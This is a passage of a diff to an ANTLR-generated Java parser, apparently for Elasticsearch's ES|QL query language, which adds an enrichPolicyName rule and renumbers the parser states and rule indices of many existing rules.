+ public final EnrichPolicyNameContext enrichPolicyName() throws RecognitionException { + EnrichPolicyNameContext _localctx = new EnrichPolicyNameContext(_ctx, getState()); + enterRule(_localctx, 96, RULE_enrichPolicyName); + int _la; + try { + enterOuterAlt(_localctx, 1); + { + setState(472); + _la = _input.LA(1); + if ( !(_la==ENRICH_POLICY_NAME || _la==QUOTED_STRING) ) { + _errHandler.recoverInline(this); + } + else { + if ( _input.LA(1)==Token.EOF ) matchedEOF = true; + _errHandler.reportMatch(this); + consume(); + } + } + } + catch (RecognitionException re) { + _localctx.exception = re; + _errHandler.reportError(this, re); + _errHandler.recover(this, re); + } + finally { + exitRule(); + } + return _localctx; + } + @SuppressWarnings("CheckReturnValue") public static class EnrichWithClauseContext extends ParserRuleContext { public QualifiedNamePatternContext newName; @@ -3624,23 +3680,23 @@ public T accept(ParseTreeVisitor visitor) { public final EnrichWithClauseContext enrichWithClause() throws RecognitionException { EnrichWithClauseContext _localctx = new EnrichWithClauseContext(_ctx, getState()); - enterRule(_localctx, 96, RULE_enrichWithClause); + enterRule(_localctx, 98, RULE_enrichWithClause); try { enterOuterAlt(_localctx, 1); { - setState(473); + setState(477); _errHandler.sync(this); switch ( getInterpreter().adaptivePredict(_input,32,_ctx) ) { case 1: { - setState(470); + setState(474); ((EnrichWithClauseContext)_localctx).newName = qualifiedNamePattern(); - setState(471); + setState(475); match(ASSIGN); } break; } - setState(475); + setState(479); ((EnrichWithClauseContext)_localctx).enrichField = qualifiedNamePattern(); } } @@ -3684,13 +3740,13 @@ public T accept(ParseTreeVisitor visitor) { public final SampleCommandContext sampleCommand() throws RecognitionException { SampleCommandContext _localctx = new SampleCommandContext(_ctx, getState()); - enterRule(_localctx, 98, RULE_sampleCommand); + enterRule(_localctx, 100, RULE_sampleCommand); try { enterOuterAlt(_localctx, 1); { - setState(477); + setState(481); match(SAMPLE); - setState(478); + setState(482); ((SampleCommandContext)_localctx).probability = constant(); } } @@ -3739,17 +3795,17 @@ public T accept(ParseTreeVisitor visitor) { public final LookupCommandContext lookupCommand() throws RecognitionException { LookupCommandContext _localctx = new LookupCommandContext(_ctx, getState()); - enterRule(_localctx, 100, RULE_lookupCommand); + enterRule(_localctx, 102, RULE_lookupCommand); try { enterOuterAlt(_localctx, 1); { - setState(480); + setState(484); match(DEV_LOOKUP); - setState(481); + setState(485); ((LookupCommandContext)_localctx).tableName = indexPattern(); - setState(482); + setState(486); match(ON); - setState(483); + setState(487); ((LookupCommandContext)_localctx).matchFields = qualifiedNamePatterns(); } } @@ -3798,22 +3854,22 @@ public T accept(ParseTreeVisitor visitor) { public final InlinestatsCommandContext inlinestatsCommand() throws RecognitionException { InlinestatsCommandContext _localctx = new InlinestatsCommandContext(_ctx, getState()); - enterRule(_localctx, 102, RULE_inlinestatsCommand); + enterRule(_localctx, 104, RULE_inlinestatsCommand); try { enterOuterAlt(_localctx, 1); { - setState(485); + setState(489); match(DEV_INLINESTATS); - setState(486); + setState(490); ((InlinestatsCommandContext)_localctx).stats = aggFields(); - setState(489); + setState(493); _errHandler.sync(this); switch ( getInterpreter().adaptivePredict(_input,33,_ctx) ) { case 1: { - setState(487); + setState(491); match(BY); 
- setState(488); + setState(492); ((InlinestatsCommandContext)_localctx).grouping = fields(); } break; @@ -3869,38 +3925,38 @@ public T accept(ParseTreeVisitor visitor) { public final ChangePointCommandContext changePointCommand() throws RecognitionException { ChangePointCommandContext _localctx = new ChangePointCommandContext(_ctx, getState()); - enterRule(_localctx, 104, RULE_changePointCommand); + enterRule(_localctx, 106, RULE_changePointCommand); try { enterOuterAlt(_localctx, 1); { - setState(491); + setState(495); match(CHANGE_POINT); - setState(492); + setState(496); ((ChangePointCommandContext)_localctx).value = qualifiedName(); - setState(495); + setState(499); _errHandler.sync(this); switch ( getInterpreter().adaptivePredict(_input,34,_ctx) ) { case 1: { - setState(493); + setState(497); match(ON); - setState(494); + setState(498); ((ChangePointCommandContext)_localctx).key = qualifiedName(); } break; } - setState(502); + setState(506); _errHandler.sync(this); switch ( getInterpreter().adaptivePredict(_input,35,_ctx) ) { case 1: { - setState(497); + setState(501); match(AS); - setState(498); + setState(502); ((ChangePointCommandContext)_localctx).targetType = qualifiedName(); - setState(499); + setState(503); match(COMMA); - setState(500); + setState(504); ((ChangePointCommandContext)_localctx).targetPvalue = qualifiedName(); } break; @@ -3946,13 +4002,13 @@ public T accept(ParseTreeVisitor visitor) { public final InsistCommandContext insistCommand() throws RecognitionException { InsistCommandContext _localctx = new InsistCommandContext(_ctx, getState()); - enterRule(_localctx, 106, RULE_insistCommand); + enterRule(_localctx, 108, RULE_insistCommand); try { enterOuterAlt(_localctx, 1); { - setState(504); + setState(508); match(DEV_INSIST); - setState(505); + setState(509); qualifiedNamePatterns(); } } @@ -3995,13 +4051,13 @@ public T accept(ParseTreeVisitor visitor) { public final ForkCommandContext forkCommand() throws RecognitionException { ForkCommandContext _localctx = new ForkCommandContext(_ctx, getState()); - enterRule(_localctx, 108, RULE_forkCommand); + enterRule(_localctx, 110, RULE_forkCommand); try { enterOuterAlt(_localctx, 1); { - setState(507); + setState(511); match(FORK); - setState(508); + setState(512); forkSubQueries(); } } @@ -4046,12 +4102,12 @@ public T accept(ParseTreeVisitor visitor) { public final ForkSubQueriesContext forkSubQueries() throws RecognitionException { ForkSubQueriesContext _localctx = new ForkSubQueriesContext(_ctx, getState()); - enterRule(_localctx, 110, RULE_forkSubQueries); + enterRule(_localctx, 112, RULE_forkSubQueries); try { int _alt; enterOuterAlt(_localctx, 1); { - setState(511); + setState(515); _errHandler.sync(this); _alt = 1; do { @@ -4059,7 +4115,7 @@ public final ForkSubQueriesContext forkSubQueries() throws RecognitionException case 1: { { - setState(510); + setState(514); forkSubQuery(); } } @@ -4067,7 +4123,7 @@ public final ForkSubQueriesContext forkSubQueries() throws RecognitionException default: throw new NoViableAltException(this); } - setState(513); + setState(517); _errHandler.sync(this); _alt = getInterpreter().adaptivePredict(_input,36,_ctx); } while ( _alt!=2 && _alt!=org.antlr.v4.runtime.atn.ATN.INVALID_ALT_NUMBER ); @@ -4113,15 +4169,15 @@ public T accept(ParseTreeVisitor visitor) { public final ForkSubQueryContext forkSubQuery() throws RecognitionException { ForkSubQueryContext _localctx = new ForkSubQueryContext(_ctx, getState()); - enterRule(_localctx, 112, RULE_forkSubQuery); + enterRule(_localctx, 114, 
RULE_forkSubQuery); try { enterOuterAlt(_localctx, 1); { - setState(515); + setState(519); match(LP); - setState(516); + setState(520); forkSubQueryCommand(0); - setState(517); + setState(521); match(RP); } } @@ -4206,8 +4262,8 @@ private ForkSubQueryCommandContext forkSubQueryCommand(int _p) throws Recognitio int _parentState = getState(); ForkSubQueryCommandContext _localctx = new ForkSubQueryCommandContext(_ctx, _parentState); ForkSubQueryCommandContext _prevctx = _localctx; - int _startState = 114; - enterRecursionRule(_localctx, 114, RULE_forkSubQueryCommand, _p); + int _startState = 116; + enterRecursionRule(_localctx, 116, RULE_forkSubQueryCommand, _p); try { int _alt; enterOuterAlt(_localctx, 1); @@ -4217,11 +4273,11 @@ private ForkSubQueryCommandContext forkSubQueryCommand(int _p) throws Recognitio _ctx = _localctx; _prevctx = _localctx; - setState(520); + setState(524); forkSubQueryProcessingCommand(); } _ctx.stop = _input.LT(-1); - setState(527); + setState(531); _errHandler.sync(this); _alt = getInterpreter().adaptivePredict(_input,37,_ctx); while ( _alt!=2 && _alt!=org.antlr.v4.runtime.atn.ATN.INVALID_ALT_NUMBER ) { @@ -4232,16 +4288,16 @@ private ForkSubQueryCommandContext forkSubQueryCommand(int _p) throws Recognitio { _localctx = new CompositeForkSubQueryContext(new ForkSubQueryCommandContext(_parentctx, _parentState)); pushNewRecursionContext(_localctx, _startState, RULE_forkSubQueryCommand); - setState(522); + setState(526); if (!(precpred(_ctx, 1))) throw new FailedPredicateException(this, "precpred(_ctx, 1)"); - setState(523); + setState(527); match(PIPE); - setState(524); + setState(528); forkSubQueryProcessingCommand(); } } } - setState(529); + setState(533); _errHandler.sync(this); _alt = getInterpreter().adaptivePredict(_input,37,_ctx); } @@ -4285,11 +4341,11 @@ public T accept(ParseTreeVisitor visitor) { public final ForkSubQueryProcessingCommandContext forkSubQueryProcessingCommand() throws RecognitionException { ForkSubQueryProcessingCommandContext _localctx = new ForkSubQueryProcessingCommandContext(_ctx, getState()); - enterRule(_localctx, 116, RULE_forkSubQueryProcessingCommand); + enterRule(_localctx, 118, RULE_forkSubQueryProcessingCommand); try { enterOuterAlt(_localctx, 1); { - setState(530); + setState(534); processingCommand(); } } @@ -4329,11 +4385,11 @@ public T accept(ParseTreeVisitor visitor) { public final RrfCommandContext rrfCommand() throws RecognitionException { RrfCommandContext _localctx = new RrfCommandContext(_ctx, getState()); - enterRule(_localctx, 118, RULE_rrfCommand); + enterRule(_localctx, 120, RULE_rrfCommand); try { enterOuterAlt(_localctx, 1); { - setState(532); + setState(536); match(DEV_RRF); } } @@ -4382,28 +4438,28 @@ public T accept(ParseTreeVisitor visitor) { public final InferenceCommandOptionsContext inferenceCommandOptions() throws RecognitionException { InferenceCommandOptionsContext _localctx = new InferenceCommandOptionsContext(_ctx, getState()); - enterRule(_localctx, 120, RULE_inferenceCommandOptions); + enterRule(_localctx, 122, RULE_inferenceCommandOptions); try { int _alt; enterOuterAlt(_localctx, 1); { - setState(534); + setState(538); inferenceCommandOption(); - setState(539); + setState(543); _errHandler.sync(this); _alt = getInterpreter().adaptivePredict(_input,38,_ctx); while ( _alt!=2 && _alt!=org.antlr.v4.runtime.atn.ATN.INVALID_ALT_NUMBER ) { if ( _alt==1 ) { { { - setState(535); + setState(539); match(COMMA); - setState(536); + setState(540); inferenceCommandOption(); } } } - setState(541); + setState(545); 
_errHandler.sync(this); _alt = getInterpreter().adaptivePredict(_input,38,_ctx); } @@ -4451,15 +4507,15 @@ public T accept(ParseTreeVisitor visitor) { public final InferenceCommandOptionContext inferenceCommandOption() throws RecognitionException { InferenceCommandOptionContext _localctx = new InferenceCommandOptionContext(_ctx, getState()); - enterRule(_localctx, 122, RULE_inferenceCommandOption); + enterRule(_localctx, 124, RULE_inferenceCommandOption); try { enterOuterAlt(_localctx, 1); { - setState(542); + setState(546); identifier(); - setState(543); + setState(547); match(ASSIGN); - setState(544); + setState(548); inferenceCommandOptionValue(); } } @@ -4504,9 +4560,9 @@ public T accept(ParseTreeVisitor visitor) { public final InferenceCommandOptionValueContext inferenceCommandOptionValue() throws RecognitionException { InferenceCommandOptionValueContext _localctx = new InferenceCommandOptionValueContext(_ctx, getState()); - enterRule(_localctx, 124, RULE_inferenceCommandOptionValue); + enterRule(_localctx, 126, RULE_inferenceCommandOptionValue); try { - setState(548); + setState(552); _errHandler.sync(this); switch (_input.LA(1)) { case QUOTED_STRING: @@ -4522,7 +4578,7 @@ public final InferenceCommandOptionValueContext inferenceCommandOptionValue() th case OPENING_BRACKET: enterOuterAlt(_localctx, 1); { - setState(546); + setState(550); constant(); } break; @@ -4530,7 +4586,7 @@ public final InferenceCommandOptionValueContext inferenceCommandOptionValue() th case QUOTED_IDENTIFIER: enterOuterAlt(_localctx, 2); { - setState(547); + setState(551); identifier(); } break; @@ -4586,26 +4642,26 @@ public T accept(ParseTreeVisitor visitor) { public final RerankCommandContext rerankCommand() throws RecognitionException { RerankCommandContext _localctx = new RerankCommandContext(_ctx, getState()); - enterRule(_localctx, 126, RULE_rerankCommand); + enterRule(_localctx, 128, RULE_rerankCommand); try { enterOuterAlt(_localctx, 1); { - setState(550); + setState(554); match(DEV_RERANK); - setState(551); + setState(555); ((RerankCommandContext)_localctx).queryText = constant(); - setState(552); + setState(556); match(ON); - setState(553); + setState(557); rerankFields(); - setState(556); + setState(560); _errHandler.sync(this); switch ( getInterpreter().adaptivePredict(_input,40,_ctx) ) { case 1: { - setState(554); + setState(558); match(WITH); - setState(555); + setState(559); inferenceCommandOptions(); } break; @@ -4662,29 +4718,29 @@ public T accept(ParseTreeVisitor visitor) { public final CompletionCommandContext completionCommand() throws RecognitionException { CompletionCommandContext _localctx = new CompletionCommandContext(_ctx, getState()); - enterRule(_localctx, 128, RULE_completionCommand); + enterRule(_localctx, 130, RULE_completionCommand); try { enterOuterAlt(_localctx, 1); { - setState(558); - match(COMPLETION); setState(562); + match(COMPLETION); + setState(566); _errHandler.sync(this); switch ( getInterpreter().adaptivePredict(_input,41,_ctx) ) { case 1: { - setState(559); + setState(563); ((CompletionCommandContext)_localctx).targetField = qualifiedName(); - setState(560); + setState(564); match(ASSIGN); } break; } - setState(564); + setState(568); ((CompletionCommandContext)_localctx).prompt = primaryExpression(0); - setState(565); + setState(569); match(WITH); - setState(566); + setState(570); ((CompletionCommandContext)_localctx).inferenceId = identifierOrParameter(); } } @@ -4893,14 +4949,14 @@ private BooleanExpressionContext booleanExpression(int _p) throws RecognitionExc 
int _parentState = getState(); BooleanExpressionContext _localctx = new BooleanExpressionContext(_ctx, _parentState); BooleanExpressionContext _prevctx = _localctx; - int _startState = 130; - enterRecursionRule(_localctx, 130, RULE_booleanExpression, _p); + int _startState = 132; + enterRecursionRule(_localctx, 132, RULE_booleanExpression, _p); int _la; try { int _alt; enterOuterAlt(_localctx, 1); { - setState(597); + setState(601); _errHandler.sync(this); switch ( getInterpreter().adaptivePredict(_input,45,_ctx) ) { case 1: @@ -4909,9 +4965,9 @@ private BooleanExpressionContext booleanExpression(int _p) throws RecognitionExc _ctx = _localctx; _prevctx = _localctx; - setState(569); + setState(573); match(NOT); - setState(570); + setState(574); booleanExpression(8); } break; @@ -4920,7 +4976,7 @@ private BooleanExpressionContext booleanExpression(int _p) throws RecognitionExc _localctx = new BooleanDefaultContext(_localctx); _ctx = _localctx; _prevctx = _localctx; - setState(571); + setState(575); valueExpression(); } break; @@ -4929,7 +4985,7 @@ private BooleanExpressionContext booleanExpression(int _p) throws RecognitionExc _localctx = new RegexExpressionContext(_localctx); _ctx = _localctx; _prevctx = _localctx; - setState(572); + setState(576); regexBooleanExpression(); } break; @@ -4938,41 +4994,41 @@ private BooleanExpressionContext booleanExpression(int _p) throws RecognitionExc _localctx = new LogicalInContext(_localctx); _ctx = _localctx; _prevctx = _localctx; - setState(573); + setState(577); valueExpression(); - setState(575); + setState(579); _errHandler.sync(this); _la = _input.LA(1); if (_la==NOT) { { - setState(574); + setState(578); match(NOT); } } - setState(577); + setState(581); match(IN); - setState(578); + setState(582); match(LP); - setState(579); + setState(583); valueExpression(); - setState(584); + setState(588); _errHandler.sync(this); _la = _input.LA(1); while (_la==COMMA) { { { - setState(580); + setState(584); match(COMMA); - setState(581); + setState(585); valueExpression(); } } - setState(586); + setState(590); _errHandler.sync(this); _la = _input.LA(1); } - setState(587); + setState(591); match(RP); } break; @@ -4981,21 +5037,21 @@ private BooleanExpressionContext booleanExpression(int _p) throws RecognitionExc _localctx = new IsNullContext(_localctx); _ctx = _localctx; _prevctx = _localctx; - setState(589); + setState(593); valueExpression(); - setState(590); + setState(594); match(IS); - setState(592); + setState(596); _errHandler.sync(this); _la = _input.LA(1); if (_la==NOT) { { - setState(591); + setState(595); match(NOT); } } - setState(594); + setState(598); match(NULL); } break; @@ -5004,13 +5060,13 @@ private BooleanExpressionContext booleanExpression(int _p) throws RecognitionExc _localctx = new MatchExpressionContext(_localctx); _ctx = _localctx; _prevctx = _localctx; - setState(596); + setState(600); matchBooleanExpression(); } break; } _ctx.stop = _input.LT(-1); - setState(607); + setState(611); _errHandler.sync(this); _alt = getInterpreter().adaptivePredict(_input,47,_ctx); while ( _alt!=2 && _alt!=org.antlr.v4.runtime.atn.ATN.INVALID_ALT_NUMBER ) { @@ -5018,7 +5074,7 @@ private BooleanExpressionContext booleanExpression(int _p) throws RecognitionExc if ( _parseListeners!=null ) triggerExitRuleEvent(); _prevctx = _localctx; { - setState(605); + setState(609); _errHandler.sync(this); switch ( getInterpreter().adaptivePredict(_input,46,_ctx) ) { case 1: @@ -5026,11 +5082,11 @@ private BooleanExpressionContext booleanExpression(int _p) throws 
RecognitionExc _localctx = new LogicalBinaryContext(new BooleanExpressionContext(_parentctx, _parentState)); ((LogicalBinaryContext)_localctx).left = _prevctx; pushNewRecursionContext(_localctx, _startState, RULE_booleanExpression); - setState(599); + setState(603); if (!(precpred(_ctx, 5))) throw new FailedPredicateException(this, "precpred(_ctx, 5)"); - setState(600); + setState(604); ((LogicalBinaryContext)_localctx).operator = match(AND); - setState(601); + setState(605); ((LogicalBinaryContext)_localctx).right = booleanExpression(6); } break; @@ -5039,18 +5095,18 @@ private BooleanExpressionContext booleanExpression(int _p) throws RecognitionExc _localctx = new LogicalBinaryContext(new BooleanExpressionContext(_parentctx, _parentState)); ((LogicalBinaryContext)_localctx).left = _prevctx; pushNewRecursionContext(_localctx, _startState, RULE_booleanExpression); - setState(602); + setState(606); if (!(precpred(_ctx, 4))) throw new FailedPredicateException(this, "precpred(_ctx, 4)"); - setState(603); + setState(607); ((LogicalBinaryContext)_localctx).operator = match(OR); - setState(604); + setState(608); ((LogicalBinaryContext)_localctx).right = booleanExpression(5); } break; } } } - setState(609); + setState(613); _errHandler.sync(this); _alt = getInterpreter().adaptivePredict(_input,47,_ctx); } @@ -5171,31 +5227,31 @@ public T accept(ParseTreeVisitor visitor) { public final RegexBooleanExpressionContext regexBooleanExpression() throws RecognitionException { RegexBooleanExpressionContext _localctx = new RegexBooleanExpressionContext(_ctx, getState()); - enterRule(_localctx, 132, RULE_regexBooleanExpression); + enterRule(_localctx, 134, RULE_regexBooleanExpression); int _la; try { - setState(640); + setState(644); _errHandler.sync(this); switch ( getInterpreter().adaptivePredict(_input,52,_ctx) ) { case 1: _localctx = new LikeExpressionContext(_localctx); enterOuterAlt(_localctx, 1); { - setState(610); + setState(614); valueExpression(); - setState(612); + setState(616); _errHandler.sync(this); _la = _input.LA(1); if (_la==NOT) { { - setState(611); + setState(615); match(NOT); } } - setState(614); + setState(618); match(LIKE); - setState(615); + setState(619); string(); } break; @@ -5203,21 +5259,21 @@ public final RegexBooleanExpressionContext regexBooleanExpression() throws Recog _localctx = new RlikeExpressionContext(_localctx); enterOuterAlt(_localctx, 2); { - setState(617); + setState(621); valueExpression(); - setState(619); + setState(623); _errHandler.sync(this); _la = _input.LA(1); if (_la==NOT) { { - setState(618); + setState(622); match(NOT); } } - setState(621); + setState(625); match(RLIKE); - setState(622); + setState(626); string(); } break; @@ -5225,41 +5281,41 @@ public final RegexBooleanExpressionContext regexBooleanExpression() throws Recog _localctx = new LikeListExpressionContext(_localctx); enterOuterAlt(_localctx, 3); { - setState(624); + setState(628); valueExpression(); - setState(626); + setState(630); _errHandler.sync(this); _la = _input.LA(1); if (_la==NOT) { { - setState(625); + setState(629); match(NOT); } } - setState(628); + setState(632); match(LIKE); - setState(629); + setState(633); match(LP); - setState(630); + setState(634); string(); - setState(635); + setState(639); _errHandler.sync(this); _la = _input.LA(1); while (_la==COMMA) { { { - setState(631); + setState(635); match(COMMA); - setState(632); + setState(636); string(); } } - setState(637); + setState(641); _errHandler.sync(this); _la = _input.LA(1); } - setState(638); + setState(642); 
match(RP); } break; @@ -5314,28 +5370,28 @@ public T accept(ParseTreeVisitor visitor) { public final MatchBooleanExpressionContext matchBooleanExpression() throws RecognitionException { MatchBooleanExpressionContext _localctx = new MatchBooleanExpressionContext(_ctx, getState()); - enterRule(_localctx, 134, RULE_matchBooleanExpression); + enterRule(_localctx, 136, RULE_matchBooleanExpression); int _la; try { enterOuterAlt(_localctx, 1); { - setState(642); + setState(646); ((MatchBooleanExpressionContext)_localctx).fieldExp = qualifiedName(); - setState(645); + setState(649); _errHandler.sync(this); _la = _input.LA(1); if (_la==CAST_OP) { { - setState(643); + setState(647); match(CAST_OP); - setState(644); + setState(648); ((MatchBooleanExpressionContext)_localctx).fieldType = dataType(); } } - setState(647); + setState(651); match(COLON); - setState(648); + setState(652); ((MatchBooleanExpressionContext)_localctx).matchQuery = constant(); } } @@ -5417,16 +5473,16 @@ public T accept(ParseTreeVisitor visitor) { public final ValueExpressionContext valueExpression() throws RecognitionException { ValueExpressionContext _localctx = new ValueExpressionContext(_ctx, getState()); - enterRule(_localctx, 136, RULE_valueExpression); + enterRule(_localctx, 138, RULE_valueExpression); try { - setState(655); + setState(659); _errHandler.sync(this); switch ( getInterpreter().adaptivePredict(_input,54,_ctx) ) { case 1: _localctx = new ValueExpressionDefaultContext(_localctx); enterOuterAlt(_localctx, 1); { - setState(650); + setState(654); operatorExpression(0); } break; @@ -5434,11 +5490,11 @@ public final ValueExpressionContext valueExpression() throws RecognitionExceptio _localctx = new ComparisonContext(_localctx); enterOuterAlt(_localctx, 2); { - setState(651); + setState(655); ((ComparisonContext)_localctx).left = operatorExpression(0); - setState(652); + setState(656); comparisonOperator(); - setState(653); + setState(657); ((ComparisonContext)_localctx).right = operatorExpression(0); } break; @@ -5556,14 +5612,14 @@ private OperatorExpressionContext operatorExpression(int _p) throws RecognitionE int _parentState = getState(); OperatorExpressionContext _localctx = new OperatorExpressionContext(_ctx, _parentState); OperatorExpressionContext _prevctx = _localctx; - int _startState = 138; - enterRecursionRule(_localctx, 138, RULE_operatorExpression, _p); + int _startState = 140; + enterRecursionRule(_localctx, 140, RULE_operatorExpression, _p); int _la; try { int _alt; enterOuterAlt(_localctx, 1); { - setState(661); + setState(665); _errHandler.sync(this); switch ( getInterpreter().adaptivePredict(_input,55,_ctx) ) { case 1: @@ -5572,7 +5628,7 @@ private OperatorExpressionContext operatorExpression(int _p) throws RecognitionE _ctx = _localctx; _prevctx = _localctx; - setState(658); + setState(662); primaryExpression(0); } break; @@ -5581,7 +5637,7 @@ private OperatorExpressionContext operatorExpression(int _p) throws RecognitionE _localctx = new ArithmeticUnaryContext(_localctx); _ctx = _localctx; _prevctx = _localctx; - setState(659); + setState(663); ((ArithmeticUnaryContext)_localctx).operator = _input.LT(1); _la = _input.LA(1); if ( !(_la==PLUS || _la==MINUS) ) { @@ -5592,13 +5648,13 @@ private OperatorExpressionContext operatorExpression(int _p) throws RecognitionE _errHandler.reportMatch(this); consume(); } - setState(660); + setState(664); operatorExpression(3); } break; } _ctx.stop = _input.LT(-1); - setState(671); + setState(675); _errHandler.sync(this); _alt = 
getInterpreter().adaptivePredict(_input,57,_ctx); while ( _alt!=2 && _alt!=org.antlr.v4.runtime.atn.ATN.INVALID_ALT_NUMBER ) { @@ -5606,7 +5662,7 @@ private OperatorExpressionContext operatorExpression(int _p) throws RecognitionE if ( _parseListeners!=null ) triggerExitRuleEvent(); _prevctx = _localctx; { - setState(669); + setState(673); _errHandler.sync(this); switch ( getInterpreter().adaptivePredict(_input,56,_ctx) ) { case 1: @@ -5614,9 +5670,9 @@ private OperatorExpressionContext operatorExpression(int _p) throws RecognitionE _localctx = new ArithmeticBinaryContext(new OperatorExpressionContext(_parentctx, _parentState)); ((ArithmeticBinaryContext)_localctx).left = _prevctx; pushNewRecursionContext(_localctx, _startState, RULE_operatorExpression); - setState(663); + setState(667); if (!(precpred(_ctx, 2))) throw new FailedPredicateException(this, "precpred(_ctx, 2)"); - setState(664); + setState(668); ((ArithmeticBinaryContext)_localctx).operator = _input.LT(1); _la = _input.LA(1); if ( !(((((_la - 89)) & ~0x3f) == 0 && ((1L << (_la - 89)) & 7L) != 0)) ) { @@ -5627,7 +5683,7 @@ private OperatorExpressionContext operatorExpression(int _p) throws RecognitionE _errHandler.reportMatch(this); consume(); } - setState(665); + setState(669); ((ArithmeticBinaryContext)_localctx).right = operatorExpression(3); } break; @@ -5636,9 +5692,9 @@ private OperatorExpressionContext operatorExpression(int _p) throws RecognitionE _localctx = new ArithmeticBinaryContext(new OperatorExpressionContext(_parentctx, _parentState)); ((ArithmeticBinaryContext)_localctx).left = _prevctx; pushNewRecursionContext(_localctx, _startState, RULE_operatorExpression); - setState(666); + setState(670); if (!(precpred(_ctx, 1))) throw new FailedPredicateException(this, "precpred(_ctx, 1)"); - setState(667); + setState(671); ((ArithmeticBinaryContext)_localctx).operator = _input.LT(1); _la = _input.LA(1); if ( !(_la==PLUS || _la==MINUS) ) { @@ -5649,14 +5705,14 @@ private OperatorExpressionContext operatorExpression(int _p) throws RecognitionE _errHandler.reportMatch(this); consume(); } - setState(668); + setState(672); ((ArithmeticBinaryContext)_localctx).right = operatorExpression(2); } break; } } } - setState(673); + setState(677); _errHandler.sync(this); _alt = getInterpreter().adaptivePredict(_input,57,_ctx); } @@ -5808,13 +5864,13 @@ private PrimaryExpressionContext primaryExpression(int _p) throws RecognitionExc int _parentState = getState(); PrimaryExpressionContext _localctx = new PrimaryExpressionContext(_ctx, _parentState); PrimaryExpressionContext _prevctx = _localctx; - int _startState = 140; - enterRecursionRule(_localctx, 140, RULE_primaryExpression, _p); + int _startState = 142; + enterRecursionRule(_localctx, 142, RULE_primaryExpression, _p); try { int _alt; enterOuterAlt(_localctx, 1); { - setState(682); + setState(686); _errHandler.sync(this); switch ( getInterpreter().adaptivePredict(_input,58,_ctx) ) { case 1: @@ -5823,7 +5879,7 @@ private PrimaryExpressionContext primaryExpression(int _p) throws RecognitionExc _ctx = _localctx; _prevctx = _localctx; - setState(675); + setState(679); constant(); } break; @@ -5832,7 +5888,7 @@ private PrimaryExpressionContext primaryExpression(int _p) throws RecognitionExc _localctx = new DereferenceContext(_localctx); _ctx = _localctx; _prevctx = _localctx; - setState(676); + setState(680); qualifiedName(); } break; @@ -5841,7 +5897,7 @@ private PrimaryExpressionContext primaryExpression(int _p) throws RecognitionExc _localctx = new FunctionContext(_localctx); _ctx = 
_localctx; _prevctx = _localctx; - setState(677); + setState(681); functionExpression(); } break; @@ -5850,17 +5906,17 @@ private PrimaryExpressionContext primaryExpression(int _p) throws RecognitionExc _localctx = new ParenthesizedExpressionContext(_localctx); _ctx = _localctx; _prevctx = _localctx; - setState(678); + setState(682); match(LP); - setState(679); + setState(683); booleanExpression(0); - setState(680); + setState(684); match(RP); } break; } _ctx.stop = _input.LT(-1); - setState(689); + setState(693); _errHandler.sync(this); _alt = getInterpreter().adaptivePredict(_input,59,_ctx); while ( _alt!=2 && _alt!=org.antlr.v4.runtime.atn.ATN.INVALID_ALT_NUMBER ) { @@ -5871,16 +5927,16 @@ private PrimaryExpressionContext primaryExpression(int _p) throws RecognitionExc { _localctx = new InlineCastContext(new PrimaryExpressionContext(_parentctx, _parentState)); pushNewRecursionContext(_localctx, _startState, RULE_primaryExpression); - setState(684); + setState(688); if (!(precpred(_ctx, 1))) throw new FailedPredicateException(this, "precpred(_ctx, 1)"); - setState(685); + setState(689); match(CAST_OP); - setState(686); + setState(690); dataType(); } } } - setState(691); + setState(695); _errHandler.sync(this); _alt = getInterpreter().adaptivePredict(_input,59,_ctx); } @@ -5940,22 +5996,22 @@ public T accept(ParseTreeVisitor visitor) { public final FunctionExpressionContext functionExpression() throws RecognitionException { FunctionExpressionContext _localctx = new FunctionExpressionContext(_ctx, getState()); - enterRule(_localctx, 142, RULE_functionExpression); + enterRule(_localctx, 144, RULE_functionExpression); int _la; try { int _alt; enterOuterAlt(_localctx, 1); { - setState(692); + setState(696); functionName(); - setState(693); + setState(697); match(LP); - setState(707); + setState(711); _errHandler.sync(this); switch (_input.LA(1)) { case ASTERISK: { - setState(694); + setState(698); match(ASTERISK); } break; @@ -5978,34 +6034,34 @@ public final FunctionExpressionContext functionExpression() throws RecognitionEx case QUOTED_IDENTIFIER: { { - setState(695); + setState(699); booleanExpression(0); - setState(700); + setState(704); _errHandler.sync(this); _alt = getInterpreter().adaptivePredict(_input,60,_ctx); while ( _alt!=2 && _alt!=org.antlr.v4.runtime.atn.ATN.INVALID_ALT_NUMBER ) { if ( _alt==1 ) { { { - setState(696); + setState(700); match(COMMA); - setState(697); + setState(701); booleanExpression(0); } } } - setState(702); + setState(706); _errHandler.sync(this); _alt = getInterpreter().adaptivePredict(_input,60,_ctx); } - setState(705); + setState(709); _errHandler.sync(this); _la = _input.LA(1); if (_la==COMMA) { { - setState(703); + setState(707); match(COMMA); - setState(704); + setState(708); mapExpression(); } } @@ -6018,7 +6074,7 @@ public final FunctionExpressionContext functionExpression() throws RecognitionEx default: break; } - setState(709); + setState(713); match(RP); } } @@ -6060,11 +6116,11 @@ public T accept(ParseTreeVisitor visitor) { public final FunctionNameContext functionName() throws RecognitionException { FunctionNameContext _localctx = new FunctionNameContext(_ctx, getState()); - enterRule(_localctx, 144, RULE_functionName); + enterRule(_localctx, 146, RULE_functionName); try { enterOuterAlt(_localctx, 1); { - setState(711); + setState(715); identifierOrParameter(); } } @@ -6115,32 +6171,32 @@ public T accept(ParseTreeVisitor visitor) { public final MapExpressionContext mapExpression() throws RecognitionException { MapExpressionContext _localctx = 
new MapExpressionContext(_ctx, getState()); - enterRule(_localctx, 146, RULE_mapExpression); + enterRule(_localctx, 148, RULE_mapExpression); int _la; try { enterOuterAlt(_localctx, 1); { - setState(713); + setState(717); match(LEFT_BRACES); - setState(714); + setState(718); entryExpression(); - setState(719); + setState(723); _errHandler.sync(this); _la = _input.LA(1); while (_la==COMMA) { { { - setState(715); + setState(719); match(COMMA); - setState(716); + setState(720); entryExpression(); } } - setState(721); + setState(725); _errHandler.sync(this); _la = _input.LA(1); } - setState(722); + setState(726); match(RIGHT_BRACES); } } @@ -6188,15 +6244,15 @@ public T accept(ParseTreeVisitor visitor) { public final EntryExpressionContext entryExpression() throws RecognitionException { EntryExpressionContext _localctx = new EntryExpressionContext(_ctx, getState()); - enterRule(_localctx, 148, RULE_entryExpression); + enterRule(_localctx, 150, RULE_entryExpression); try { enterOuterAlt(_localctx, 1); { - setState(724); + setState(728); ((EntryExpressionContext)_localctx).key = string(); - setState(725); + setState(729); match(COLON); - setState(726); + setState(730); ((EntryExpressionContext)_localctx).value = constant(); } } @@ -6464,17 +6520,17 @@ public T 